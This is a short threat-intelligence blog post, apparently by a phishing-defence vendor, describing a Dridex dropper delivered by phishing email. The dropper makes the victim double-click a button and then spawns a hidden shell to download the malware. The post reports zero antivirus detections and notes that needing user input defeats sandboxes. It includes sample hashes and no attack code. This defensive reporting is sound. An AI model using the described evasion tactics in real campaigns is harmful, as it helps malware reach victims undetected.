Detecting a Dridex Variant that Evades Anti-virus

Attackers constantly tweak their malware to avoid detection. The latest iteration of Dridex we’ve analyzed provides a great example of malware designed to evade anti-virus, sandboxing, and other detection technologies.

How did we get our hands on malware that went undetected by A/V? Since this malware (like the majority of malware) was delivered via a phishing email, we received the sample from a user reporting the phishing email using Reporter.

Here’s a screenshot of the phishing email sent to several of our users:

Phishing email sent to internal users

Figure 1 — Phishing email sent to internal users

In this specific example, the user is presented with a button to double-click in order to “display the content.”

Button to view content

Figure 2 — Button to double-click to view the content

Once double-clicked, the user is presented with a warning box.

Warning box

Figure 3 — Warning box presented to the user

When the user clicks OK, a command shell is spawned in the background to download a sample of Dridex.

Dridex download

Figure 4 — Dridex being downloaded

It’s amazing how many AV products flag this file as being malicious. The surprising answer is none of them.

Virus Total results

Figure 5 — 0/57 A/V hits

Since you need user-input to push the button…this bypasses sandbox technology as well! Once downloaded, the state of detection for Dridex is less grim, with 5/57 AV vendors picking up on it.

A/V hits for Dridex sample

Figure 6 — A/V hits for Dridex sample

While there is no silver bullet to security, user-generated reports have proven very successful here at PhishMe and other organizations, as many of our users have reported new and interesting threats that target not just us, but industries worldwide. By hooking the human into the security program, we not only find new and interesting malware, but we also close the gap on the kill chain.

Dropper: https://www.virustotal.com/en/file/244126a2873c26f76d9dfa8f993b4209ac8a52fd00a91d98a23c0c90764d1a73/analysis/

Dridex sample: https://www.virustotal.com/en/file/f2328ad463d584ba06cba3338d73b1ee2ba772401d51cf0c88c51aec53bd3623/analysis/1427292890/

eWeek: PhishMe Raises $13M for Phishing Awareness Technology
SC Magazine: NJRat making a comeback, researchers observe